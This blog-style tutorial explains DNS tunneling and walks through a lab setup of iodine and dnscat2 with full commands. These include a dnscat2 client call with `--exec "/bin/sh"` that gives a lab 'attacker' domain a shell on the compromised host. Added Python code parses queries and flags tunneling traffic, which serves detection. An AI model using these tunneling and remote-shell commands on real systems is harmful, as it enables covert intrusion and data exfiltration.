Danger Under Innocence: DNS Tunneling

Ekrem C.
10 min read · Dec 19, 2020


In this article, I will show how an innocent and simple form of data communication can be abused. The protocol in question serves a basic purpose and, as the title suggests, it is DNS.

Photo by Markus Spiske on Unsplash

DNS tunneling is the result of misuse of the DNS protocol. In DNS tunneling, the information conveyed is dressed up as a domain name query and its response, but in fact data is being transferred out of the system or delivered into it.

1. Brief information about DNS Protocol

DNS is the protocol that converts human-readable domain names into IP addresses. It is one of the basic protocols of Internet communication and is therefore used everywhere. It consists of queries and answers. An infrastructure generally has trusted DNS servers that forward DNS queries to the respective Authoritative DNS server. These are called Caching / Forwarding DNS servers and are found in service provider infrastructures or in organizations themselves. The gateways used by home users also act as Forwarding DNS servers and generally forward DNS queries to the DNS servers specified in their configuration.

The flow of a DNS lookup is straightforward. The user sends a recursive query to the DNS server in the environment; the DNS server receives this query and checks whether the answer is in one of its Forward Lookup Zones or in its cache. If it finds it, it returns the answer to the user; if not, it looks for the answer via the Root Hint servers or the configured Forwarder addresses. If it still cannot find an answer after these attempts, it returns a "not found" response to the user.

DNS record types vary depending on the information to be learned. More than 40 record types exist. [1] The most commonly used record types are as follows:

  • A: DNS host record; stores a hostname and its corresponding IPv4 address.
  • AAAA: Stores a hostname and its corresponding IPv6 address.
  • CNAME: Can be used to alias a hostname to another hostname.
  • MX: Specifies an SMTP email server for the domain; used to route outgoing emails to an email server.
  • NS: Specifies that a DNS zone is delegated to a specific Authoritative Name Server, and provides the address of that name server.
  • PTR: Allows a DNS resolver to supply an IP address and receive a hostname (reverse DNS lookup).
  • TXT: Typically carries machine-readable data such as opportunistic encryption settings, Sender Policy Framework, DKIM, DMARC, etc.
  • SOA: Indicates the Authoritative Name Server for the current DNS zone, contact details for the domain administrator, the serial number and TTLs.
  • SRV: A service location record, like MX but for other communication protocols.
  • CERT: Stores certificates such as PKIX, SPKI, PGP, and so on.

A label may contain zero to 63 characters. The null label (length zero) is reserved for the root zone. [2] The full domain name cannot exceed the length of 253 characters in its textual representation. In the internal binary representation of the DNS the maximum length requires 255 octets of storage, as it also stores the length of the name.

Within a label, letters and digits are allowed, as well as the hyphen ("-"). No other punctuation is permitted, including the underscore ("_"). Labels are not case-sensitive.

The DNS protocol usually uses UDP port 53 for communication. TCP port 53 is used for zone transfers and for messages larger than 512 bytes.
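The name rules above become concrete when you encode and decode a question on the wire. The following is an added example, not code from the article: it builds a minimal DNS query, enforces the 63-octet label and 255-octet name limits from RFC 1035 while doing so, and parses it back, reporting the properties of the queried name (longest label, whether it follows the letters/digits/hyphen rule) that later sections rely on. The `build_query`, `parse_question` and `label_is_ldh` names are my own.

```python
import struct

MAX_LABEL = 63        # RFC 1035: a label holds at most 63 octets
MAX_NAME_WIRE = 255   # a full name is at most 255 octets on the wire (253 in text form)

def label_is_ldh(label: str) -> bool:
    """Letters, digits and hyphen only, no leading or trailing hyphen (the hostname rule)."""
    ok = all(c.isascii() and (c.isalnum() or c == "-") for c in label)
    return ok and not label.startswith("-") and not label.endswith("-")

def build_query(name: str, qtype: int = 1, txid: int = 0x1234) -> bytes:
    """Encode a minimal DNS query: 12-byte header plus one question (qtype 1 = A)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # flags: RD set; QDCOUNT = 1
    wire = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 1 <= len(raw) <= MAX_LABEL:
            raise ValueError(f"label {label!r} is {len(raw)} octets, limit is {MAX_LABEL}")
        wire += bytes([len(raw)]) + raw            # length-prefixed label
    wire += b"\x00"                                # the empty root label terminates the name
    if len(wire) > MAX_NAME_WIRE:
        raise ValueError(f"name is {len(wire)} octets on the wire, limit is {MAX_NAME_WIRE}")
    return header + wire + struct.pack("!HH", qtype, 1)   # QCLASS 1 = IN

def parse_question(msg: bytes) -> dict:
    """Decode the header and first question; report the name properties a defender looks at."""
    txid, flags, qdcount = struct.unpack("!HHH", msg[:6])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    pos, labels = 12, []
    while True:
        length = msg[pos]
        pos += 1
        if length == 0:
            break
        if length > MAX_LABEL:   # 0xC0.. would be a compression pointer, not expected in a question
            raise ValueError("label length above 63 (or compression pointer) in question name")
        labels.append(msg[pos:pos + length].decode("ascii"))
        pos += length
    qtype, qclass = struct.unpack("!HH", msg[pos:pos + 4])
    return {
        "id": txid,
        "recursion_desired": bool(flags & 0x0100),
        "qname": ".".join(labels).lower(),   # labels are case-insensitive, so compare lower-cased
        "qtype": qtype,
        "qclass": qclass,
        "label_count": len(labels),
        "longest_label": max(len(l) for l in labels),
        "hostname_safe": all(label_is_ldh(l) for l in labels),
    }
```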

2. How Can DNS Be Abused?

DNS tunneling is a cyber attack technique that encodes the data of other programs or protocols inside DNS queries and responses. It is essentially a misuse of the DNS protocol, and it creates a hidden communication channel that bypasses the organization's security layers. It has been around for almost 20 years.

The DNS tunneling concept was originally devised as a way to bypass captive portals, but over time it has been used to cause more serious damage, such as data exfiltration or communication between malware and its C&C (command and control) servers. DNS tunneling has been used frequently in targeted attacks over the past few years.

Typically, DNS tunneling applications run in a server-client architecture. The compromised system must have network connectivity, since DNS tunneling requires access to an internal DNS server that can reach the Internet. The attacker must also control a domain and a server that can act as its authoritative name server in order to run the server side of the tunnel.

How DNS tunneling works

The DNS tunneling payload is usually transported in encoded form, and tools differ in the encoding they use. In this project, the domain t.tunneldomain.com will be used for the tunneling tests, so the queries will look like WW24GRT579BQBG1MLH6DA72GDXXSDVZ.t.tunneldomain.com.

DNS query comparison (figure): a regular query/response next to a DNS tunneling query/response.

[3] Some popular DNS tunneling tools readily available on the Internet are as follows:

2.1. IODINE

It runs on Linux, Mac OS X, FreeBSD, NetBSD, OpenBSD and Windows. The bandwidth is asymmetrical with limited upstream and up to 1 Mbit/s downstream. It can use the NULL type that allows the downstream data to be sent without encoding. Each DNS reply can contain over a kilobyte of compressed payload data. Iodine handles setting IP number on interfaces automatically, and up to 16 users can share one server at the same time. Packet size is automatically probed for maximum downstream throughput.

2.2. DNSCat

Dnscat2 can be used for C&C server communication. It can upload/download files or run a shell, and the channel is encrypted. The client is written in C and the server in Ruby.

2.3. Heyoka

Heyoka is a Proof of Concept of an exfiltration tool which uses spoofed DNS requests to create a bidirectional tunnel. It aims to achieve both performance and stealth. It is written in C. The tunnel is up to 60% faster compared to existing tools because of binary encoding.

2.4. OzymanDNS

It is used to set up an SSH tunnel over DNS or to transfer files. Requests are base32 encoded and responses are base64 encoded TXT records. It is written in Perl.

2.5. TCP-over-DNS

It runs on Windows, Linux and Solaris. Both the server and the client are written in Java. It also supports LZMA compression.

In this article, a demonstration environment will be set up using Iodine and DNSCat2 tools and the DNS queries made by these tools will be inspected.

3. Demonstration Setup

As mentioned before, the attacker must have a domain name and an Authoritative DNS server under their control. In addition, a compromised client system on which the DNS tunneling client application will run is needed, along with a DNS server that acts as the Caching / Forwarding DNS for that system. To satisfy these needs, the following components are used in the topology shown above (Figure 1):

  • Attacker controlled Authoritative DNS Server (Bind DNS)
  • Attacker controlled DNS Tunneling Server (Ubuntu)
  • Trusted Caching/Forwarding DNS Server (Bind DNS)
  • Compromised Client System running the DNS Tunneling Client (Ubuntu)

3.1. Attacker Controlled Authoritative DNS Server

A fake domain name that is not used on the Internet was used in this project. This domain name, eko-project.com, has been defined on the Authoritative DNS server and Authoritative DNS server IP address was entered as the NS record.

The tunneling tool is usually not run on the same server as the authoritative DNS server, because in this case the application may need to listen on a different port for DNS traffic. For this reason, the Authoritative DNS server and the server where the tunneling tool is used are separated. A subdomain has been determined to redirect the traffic to the tunneling application and delegated to this server where the tunneling application is running for this domain on the Authoritative DNS server.

3.2. Trusted Caching/Forwarding DNS Server

As mentioned above, a fake domain name that is not used on the internet was used as a domain name in the demonstration environment. For this reason, queries were redirected to the relevant authoritative DNS server by statically defining a [4] forwarder zone for this domain name on Forwarding DNS.

3.3. IODINE Setup and Usage

[5] Iodine is an extremely easy tool to set up and use. The package is installed with the following commands:

#sudo apt update

#sudo apt install iodine

To run the tool on the server side, the following command is used:

#sudo iodined -fcP password tunnel_ip tunneling_domain

In the demonstration environment it was run with the following parameters:

#sudo iodined -fcP aPassword 10.0.0.1 t.eko-project.com

On the client side, the package is installed with the same commands. The client is then started with the following command:

#sudo iodine -frP password dns_server_ip tunneling_domain

The following command was used during the demonstration:

#sudo iodine -frP aPassword 192.168.1.31 t.eko-project.com

The parameters used during the demonstration are explained below.

  • -f: Iodine keeps running in the foreground
  • -c: Disable checking of the client IP
  • -P: Authentication password
  • -r: If not used, iodine checks whether the iodined server is reachable directly. If it is reachable, it sends requests directly to it without relaying through DNS.
  • -m: Force the maximum fragment size. If not used, iodine automatically probes the maximum fragment size.
  • -M: Maximum length of upstream hostnames. The default is 255.
  • -T: Query type.
  • -I: Maximum interval between requests for keep-alives

Output of the usage is shown below (figures): IODINE server screen output, IODINE client screen output, IODINE query samples.

3.4. DNSCat2 Setup and Usage

[6] This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol. The server part is written in Ruby, the client part in C.

To install the tool, the necessary packages must be installed as follows:

# sudo apt install ruby ruby-dev build-essential

# git clone https://github.com/iagox86/dnscat2.git

# cd dnscat2/server/

# gem install bundler

# sudo gem install bundler

# sudo bundle install

If another application is using UDP port 53, it must be stopped or unbound from the port. In the demonstration environment, the systemd-resolved service was stopped with the following command:

# sudo systemctl stop systemd-resolved.service

The following command is sufficient to run the server part of the tool:

# sudo ruby dnscat2.rb tunnel_domain_name

The following command was used in the demonstration:

# sudo ruby dnscat2.rb t.eko-project.com

Since the client part of the tool is written in C, it is enough to download it with "git" and build it. The client is run with the following commands:

# cd dnscat2/client/

# ./dnscat tunnel_domain_name

The following command was used in the demonstration. [7] The --exec parameter in this command makes the client hand a shell on the local (compromised) system to the remote server.

# ./dnscat t.eko-project.com --exec "/bin/sh"

In addition, the parameters shown below are used during the demonstration.

  • -delay: Sets the maximum delay between packets.
  • -steady: Always wait for the delay before sending.
  • -type: Specifies the record type. The default is TXT, CNAME, MX.

Output of the usage is shown below (figures): DNSCat server usage, DNSCat client usage, DNSCat2 server usage after the client connects, DNSCat sample queries.

4. Conclusion

As you can see, DNS tunneling is extremely easy to set up. This technique has also been used in sophisticated attacks in recent years. I recommend reviewing the link below:

This situation calls for a more detailed analysis of the DNS queries made in the environment. However, DNS tunneling is difficult to detect because its queries resemble ordinary DNS queries and follow no single fixed pattern. Organizations therefore need to log and examine their DNS traffic.
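As an added example (not from the original article) of the kind of query analysis the closing paragraph asks for: this Python script parses constructed BIND-style query-log lines and, for each base domain, measures the length and Shannon entropy of the leftmost label (where the encoded payload of a name such as the section 2 sample lives), how often the record types favoured by the tools above appear, and whether any name ever repeats. The log lines, the thresholds and the two-label `base_domain` heuristic are assumptions for illustration.

```python
import math
import re
from collections import defaultdict

# Constructed BIND9-style query-log lines (not captured from the article's lab); the first tunnel
# label is the article's own section 2 sample, lower-cased, and the other two are made up.
SAMPLE_LOG = """\
client 10.0.0.5#51000 (www.example.com): query: www.example.com IN A + (192.168.1.31)
client 10.0.0.5#51001 (mail.example.com): query: mail.example.com IN MX + (192.168.1.31)
client 10.0.0.9#41000 (ww24grt579bqbg1mlh6da72gdxxsdvz.t.eko-project.com): query: ww24grt579bqbg1mlh6da72gdxxsdvz.t.eko-project.com IN NULL + (192.168.1.31)
client 10.0.0.9#41001 (pa8fjk2mq0zzv9hldt4c7rbyx1e6wnsg.t.eko-project.com): query: pa8fjk2mq0zzv9hldt4c7rbyx1e6wnsg.t.eko-project.com IN NULL + (192.168.1.31)
client 10.0.0.9#41002 (z3ugw8kqd2r0t5nhbcx7pl1m9fvesaoy.t.eko-project.com): query: z3ugw8kqd2r0t5nhbcx7pl1m9fvesaoy.t.eko-project.com IN TXT + (192.168.1.31)
client 10.0.0.5#51002 (cdn.example.com): query: cdn.example.com IN AAAA + (192.168.1.31)
"""
QUERY_RE = re.compile(r"query: (?P<qname>\S+) IN (?P<qtype>\S+)")
RARE_TYPES = {"NULL", "TXT", "CNAME", "MX", "SRV"}   # record types the tools above favour

def entropy(s: str) -> float:
    """Shannon entropy in bits per character; base32/base64-like payload labels score high."""
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def base_domain(qname: str) -> str:
    """Crude registered-domain guess (last two labels); use a public-suffix list in production."""
    return ".".join(qname.rstrip(".").split(".")[-2:])

def analyze(log_text: str, min_queries: int = 3) -> dict:
    """Per base domain: volume, mean leftmost-label length and entropy, rare-type share, repeats."""
    stats = defaultdict(lambda: {"n": 0, "len": 0.0, "ent": 0.0, "rare": 0, "names": set()})
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        qname, qtype = m["qname"].lower(), m["qtype"]
        leftmost = qname.split(".")[0]           # tunnels carry their upstream payload here
        s = stats[base_domain(qname)]
        s["n"] += 1
        s["len"] += len(leftmost)
        s["ent"] += entropy(leftmost)
        s["rare"] += qtype in RARE_TYPES
        s["names"].add(qname)
    report = {}
    for dom, s in stats.items():
        n, avg_len, avg_ent = s["n"], s["len"] / s["n"], s["ent"] / s["n"]
        # long, high-entropy, never-repeating leftmost labels under one domain is the tunnel signature
        suspicious = n >= min_queries and avg_len >= 20 and avg_ent >= 3.5 and len(s["names"]) == n
        report[dom] = {"queries": n, "avg_label_len": round(avg_len, 1), "avg_entropy": round(avg_ent, 2),
                       "rare_type_share": round(s["rare"] / n, 2), "suspicious": suspicious}
    return report
```

Run against real logs, the same aggregation should also be keyed by client IP, since a tunneling client typically produces the volume alone.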

5. References

[1] P. Mockapetris, RFC 1035, Domain Names - Implementation and Specification, the Internet Society (November 1987)

[2] DNS: Types of DNS Records, DNS Servers and DNS Query Types

https://ns1.com/resources/dns-types-records-servers-and-queries

http://www.tcpipguide.com/free/t_DNSLabelsNamesandSyntaxRules.htm

[3] G. Farnham (2013), Detecting DNS Tunneling, SANS Institute Information Security Reading Room

[4] How to Create Forward Lookup Zones for Bind

[5] Iodine, https://github.com/yarrick/iodine

https://www.doyler.net/security-not-included/iodine-dns-tunneling

[6] DNSCat2, https://github.com/iagox86/dnscat2

https://www.hackingarticles.in/dnscat2-command-and-control-over-the-dns/

[7] Reverse shell with DNSCat2

https://www.blackhillsinfosec.com/powershell-dns-command-control-with-dnscat2-powershell/

Written by Ekrem C.

Networker. Cyber Security MSc.
